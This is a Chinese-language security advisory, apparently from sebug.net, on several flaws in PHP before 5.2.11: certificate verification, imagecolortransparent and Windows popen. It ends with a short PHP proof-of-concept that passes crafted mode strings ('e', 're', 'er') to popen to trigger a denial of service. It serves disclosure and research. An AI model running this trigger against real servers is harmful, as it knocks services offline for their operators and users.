PHP是廣泛使用的通用目的腳本語言，特別適合于Web開發，可嵌入到HTML中。PHP的5.2.11之前版本的多個函數中存在安全漏洞，可能允許遠程攻擊者導致拒絕服務或完全入侵用戶系統。

1) PHP的php_openssl_apply_verification_policy函數沒有正確的執行證書驗證，可能允許攻擊者通過偽造的證書執行欺騙攻擊。

2) imagecolortransparent函數沒有正確的對顏色索引執行過濾檢查。

3) 當運行在某些Windows操作系統上時，TSRM/tsrm_win32.c文件中的popen API函數允許攻擊者通過第二個參數中的特制e或er字符串導致拒絕服務。

<*參考

http://secunia.com/advisories/36791

http://bugs.php.net/bug.php?id=44683

*>

測試方法:

[www.sebug.net]

本站提供程序(方法)可能帶有攻擊性,僅供安全研究與教學之用,風險自負!
$t1 = popen("echo hello", "e");
pclose($t1);
$t2 = popen("echo hello", "re");
pclose($t2);
$t3 = popen("echo hello", "er");
pclose($t3);
?>